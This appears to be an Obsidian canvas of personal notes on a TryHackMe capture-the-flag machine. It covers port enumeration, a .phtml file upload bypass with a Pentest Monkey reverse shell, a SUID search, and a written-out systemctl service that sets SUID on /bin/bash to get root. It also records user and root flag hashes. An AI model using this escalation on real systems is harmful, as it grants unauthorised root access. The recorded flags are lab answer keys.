{
	"nodes":[
		{"id":"fe6844b532bdc4e3","type":"text","text":"10.10.165.30","x":-180,"y":-80,"width":250,"height":60,"color":"1"},
		{"id":"4ec43f3a08f874f1","type":"text","text":"# Enum","x":160,"y":-200,"width":250,"height":60,"color":"3"},
		{"id":"fbd9e14e0398ce7a","type":"text","text":"## NMAP ","x":530,"y":-350,"width":250,"height":60,"color":"6"},
		{"id":"4edf646b737d9693","type":"text","text":"3333/tcp http apache httpd 2.4.18","x":940,"y":-620,"width":250,"height":60},
		{"id":"a5e1abe6a0033bbe","type":"text","text":"21/tcp ftp vsftpd 3.0.3","x":940,"y":-480,"width":250,"height":60},
		{"id":"4c899f7dbf881731","type":"text","text":"22/tcp ssh","x":940,"y":-350,"width":250,"height":60},
		{"id":"9acc208dce8b878f","type":"text","text":"139/tcp netbios-ssn amba smbd 3.X - 4.X ","x":940,"y":-230,"width":250,"height":60},
		{"id":"1869eb03429fbca7","type":"text","text":"445/tcp netbios-ssn Samba smbd 4.3.11-Ubuntu","x":940,"y":-110,"width":250,"height":90},
		{"id":"b3f6fc37790b9924","type":"text","text":"3128/tcp http-proxy Squid http proxy 3.5.12","x":940,"y":20,"width":250,"height":60},
		{"id":"797d51ca533873cc","type":"text","text":"/internal/\n","x":1400,"y":-878,"width":240,"height":60},
		{"id":"b03619c2816f6f2a","type":"file","file":"CTF/TryHackMe/Screen_shots/Pasted image 20231228015411.png","x":1860,"y":-1180,"width":660,"height":302},
		{"id":"24d6fdfa9b6e7fda","type":"text","text":"## File Upload Bypass","x":-920,"y":-350,"width":290,"height":60},
		{"id":"1f8e025ea0173afd","type":"file","file":"CTF/TryHackMe/Screen_shots/Pasted image 20231228021412.png","x":-1420,"y":-1080,"width":726,"height":448},
		{"id":"276b49fa89d0f264","type":"text","text":"### Reverse Shell Pentest Monkey","x":-1357,"y":20,"width":368,"height":60},
		{"id":"0ee4ad1d0f2c2a71","type":"file","file":"CTF/TryHackMe/Screen_shots/Pasted image 20231228015509.png","x":306,"y":-1450,"width":698,"height":572},
		{"id":"531314fc4f31b886","type":"file","file":"CTF/TryHackMe/Screen_shots/Pasted image 20231228021551.png","x":-1620,"y":-440,"width":525,"height":241},
		{"id":"57a39daa209e7177","type":"text","text":"# Foothold","x":-520,"y":50,"width":250,"height":60,"color":"3"},
		{"id":"64a337710f23d58c","type":"file","file":"CTF/TryHackMe/Screen_shots/Pasted image 20231228021741.png","x":-3600,"y":200,"width":1525,"height":651},
		{"id":"bf5820a3d89fdafb","type":"text","text":"# Privesc","x":160,"y":50,"width":250,"height":60,"color":"3"},
		{"id":"958a9d11f4b49fc5","type":"text","text":"# Exploitation","x":-520,"y":-200,"width":250,"height":60,"color":"3"},
		{"id":"56d66bbfe1e0aba7","type":"text","text":"# **Now that the file is uploaded we need a way to execute it, by directory bruteforcing we would get the location of the directory but somehow ran the actual script**","x":-1620,"y":262,"width":520,"height":264},
		{"id":"778917f1f4641536","type":"file","file":"CTF/TryHackMe/Screen_shots/Pasted image 20231228021814.png","x":-1620,"y":1000,"width":1619,"height":376},
		{"id":"bc1d8838f00f9241","type":"text","text":"## Check SUID Executables\n`find / -type f -a \\( -perm -u+s -o -perm -g+s \\) -exec ls -l {} \\; 2> /dev/null`","x":343,"y":312,"width":657,"height":128},
		{"id":"b8fab3d4e9ca6fc4","type":"file","file":"CTF/TryHackMe/Screen_shots/Pasted image 20231228031602.png","x":672,"y":580,"width":902,"height":240},
		{"id":"3e2ebd1b5206e32f","type":"file","file":"CTF/TryHackMe/Screen_shots/Pasted image 20231228031627.png","x":1574,"y":1000,"width":1397,"height":681},
		{"id":"f57eebcbfac15724","type":"file","file":"CTF/TryHackMe/Screen_shots/Pasted image 20231228032005.png","x":2932,"y":2280,"width":1743,"height":828},
		{"id":"0ed5fa807112a2cd","type":"text","text":"## Since systemctl is considered SUID executable, we can simply add `chmod + s /bin/bash` so it would be executable then run `bash -p` in privileged mode to get root ","x":1440,"y":1960,"width":593,"height":160},
		{"id":"011599060988ce7e","type":"text","text":" ```bash\nTF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/bash -c \"chmod +s /bin/bash > /tmp/getroot\"\n[Install]\nWantedBy=multi-user.target' > $TF\n./systemctl link $TF\n./systemctl enable --now $TF\n```","x":1120,"y":2320,"width":677,"height":246},
		{"id":"2e41e501ac154f4e","type":"file","file":"CTF/TryHackMe/Screen_shots/Pasted image 20231228032808.png","x":900,"y":2760,"width":540,"height":402},
		{"id":"29a575a0a795bfd5","type":"text","text":"|  | **FLAG** |\n| --- | --- |\n| **root.txt** | a58ff8579f0a9270368d33a9966c7fd5 |","x":946,"y":3280,"width":448,"height":100},
		{"id":"81f2605eba525cd2","type":"text","text":"## in that case we replace id with cat /root/root.txt","x":2680,"y":1960,"width":424,"height":101},
		{"id":"b5f3da2ed7ce3b2b","type":"text","text":"|  | **FLAG** |\n| --- | --- |\n| **root.txt** | a58ff8579f0a9270368d33a9966c7fd5 |","x":3580,"y":3280,"width":448,"height":100},
		{"id":"dd29031d3dc14c23","type":"file","file":"CTF/TryHackMe/Screen_shots/Pasted image 20231228032206.png","x":-1674,"y":1720,"width":754,"height":320},
		{"id":"f311056e45d54b22","type":"text","text":"|  | **FLAG** |\n| ---- | ---- |\n| **user.txt** | 8bd7992fbe8a6ad22a63361004cfcedb |\n\n","x":-2075,"y":2320,"width":460,"height":100}
	],
	"edges":[
		{"id":"5aa8fe754246b12d","fromNode":"fe6844b532bdc4e3","fromSide":"right","toNode":"4ec43f3a08f874f1","toSide":"left"},
		{"id":"fa374e31fdf4e9c4","fromNode":"4ec43f3a08f874f1","fromSide":"right","toNode":"fbd9e14e0398ce7a","toSide":"left"},
		{"id":"6176a4b1c5f37530","fromNode":"fbd9e14e0398ce7a","fromSide":"right","toNode":"4edf646b737d9693","toSide":"left"},
		{"id":"de4503a8e9f5dced","fromNode":"fbd9e14e0398ce7a","fromSide":"right","toNode":"a5e1abe6a0033bbe","toSide":"left"},
		{"id":"92efeacc00864e7b","fromNode":"fbd9e14e0398ce7a","fromSide":"right","toNode":"4c899f7dbf881731","toSide":"left"},
		{"id":"25abd21cec54e061","fromNode":"fbd9e14e0398ce7a","fromSide":"right","toNode":"9acc208dce8b878f","toSide":"left"},
		{"id":"653ea5df587e8253","fromNode":"fbd9e14e0398ce7a","fromSide":"right","toNode":"1869eb03429fbca7","toSide":"left"},
		{"id":"0be8ac39557b1c4d","fromNode":"fbd9e14e0398ce7a","fromSide":"right","toNode":"b3f6fc37790b9924","toSide":"left"},
		{"id":"8d4cd8faa77cde6a","fromNode":"4edf646b737d9693","fromSide":"top","toNode":"797d51ca533873cc","toSide":"left"},
		{"id":"3c249bb42a82888d","fromNode":"797d51ca533873cc","fromSide":"right","toNode":"b03619c2816f6f2a","toSide":"left"},
		{"id":"1638ae15063d48d1","fromNode":"fbd9e14e0398ce7a","fromSide":"top","toNode":"0ee4ad1d0f2c2a71","toSide":"bottom"},
		{"id":"471135a535e11c27","fromNode":"fe6844b532bdc4e3","fromSide":"left","toNode":"958a9d11f4b49fc5","toSide":"right"},
		{"id":"884ac6cbd692130f","fromNode":"958a9d11f4b49fc5","fromSide":"left","toNode":"24d6fdfa9b6e7fda","toSide":"right"},
		{"id":"dea3c37b44eeeceb","fromNode":"24d6fdfa9b6e7fda","fromSide":"top","toNode":"1f8e025ea0173afd","toSide":"bottom","toEnd":"none","color":"1","label":"Allowed Extension .phtml"},
		{"id":"11d8ff2e07dc9522","fromNode":"24d6fdfa9b6e7fda","fromSide":"left","toNode":"531314fc4f31b886","toSide":"right"},
		{"id":"da87e3fe56f88cb9","fromNode":"24d6fdfa9b6e7fda","fromSide":"bottom","toNode":"276b49fa89d0f264","toSide":"right"},
		{"id":"23df072cfdc95ee8","fromNode":"276b49fa89d0f264","fromSide":"left","toNode":"64a337710f23d58c","toSide":"top"},
		{"id":"f4796a64a0afe0e7","fromNode":"fe6844b532bdc4e3","fromSide":"left","toNode":"57a39daa209e7177","toSide":"right"},
		{"id":"49c8b42edd11083a","fromNode":"fe6844b532bdc4e3","fromSide":"right","toNode":"bf5820a3d89fdafb","toSide":"left"},
		{"id":"4e5f482ad16f8f6d","fromNode":"57a39daa209e7177","fromSide":"bottom","toNode":"778917f1f4641536","toSide":"top"},
		{"id":"e0601c76f6e23636","fromNode":"56d66bbfe1e0aba7","fromSide":"left","toNode":"64a337710f23d58c","toSide":"right","toEnd":"none"},
		{"id":"0bd273cdb54c639a","fromNode":"57a39daa209e7177","fromSide":"left","toNode":"56d66bbfe1e0aba7","toSide":"right"},
		{"id":"606cd22cc5db4b40","fromNode":"bf5820a3d89fdafb","fromSide":"bottom","toNode":"bc1d8838f00f9241","toSide":"top"},
		{"id":"64c0ecf0e285201a","fromNode":"bc1d8838f00f9241","fromSide":"bottom","toNode":"b8fab3d4e9ca6fc4","toSide":"top"},
		{"id":"d7ea8a42c6f83ec9","fromNode":"b8fab3d4e9ca6fc4","fromSide":"bottom","toNode":"3e2ebd1b5206e32f","toSide":"top"},
		{"id":"8b9334efabb1634b","fromNode":"3e2ebd1b5206e32f","fromSide":"bottom","toNode":"81f2605eba525cd2","toSide":"top","color":"1","label":"Method 1"},
		{"id":"0e414800aa2b5880","fromNode":"81f2605eba525cd2","fromSide":"bottom","toNode":"f57eebcbfac15724","toSide":"top"},
		{"id":"1a0a0fcd0628ef20","fromNode":"f57eebcbfac15724","fromSide":"bottom","toNode":"b5f3da2ed7ce3b2b","toSide":"top"},
		{"id":"346a27a013ca63e3","fromNode":"0ed5fa807112a2cd","fromSide":"bottom","toNode":"011599060988ce7e","toSide":"top"},
		{"id":"83148718faede598","fromNode":"011599060988ce7e","fromSide":"bottom","toNode":"2e41e501ac154f4e","toSide":"top"},
		{"id":"55d06f62ccc85c05","fromNode":"2e41e501ac154f4e","fromSide":"bottom","toNode":"29a575a0a795bfd5","toSide":"top"},
		{"id":"0082232a552d1d65","fromNode":"3e2ebd1b5206e32f","fromSide":"bottom","toNode":"0ed5fa807112a2cd","toSide":"top","color":"1","label":"Method 2"},
		{"id":"f3c7d7cf5c7475a8","fromNode":"778917f1f4641536","fromSide":"bottom","toNode":"dd29031d3dc14c23","toSide":"top"},
		{"id":"aa120442f48b7138","fromNode":"dd29031d3dc14c23","fromSide":"bottom","toNode":"f311056e45d54b22","toSide":"right"}
	]
}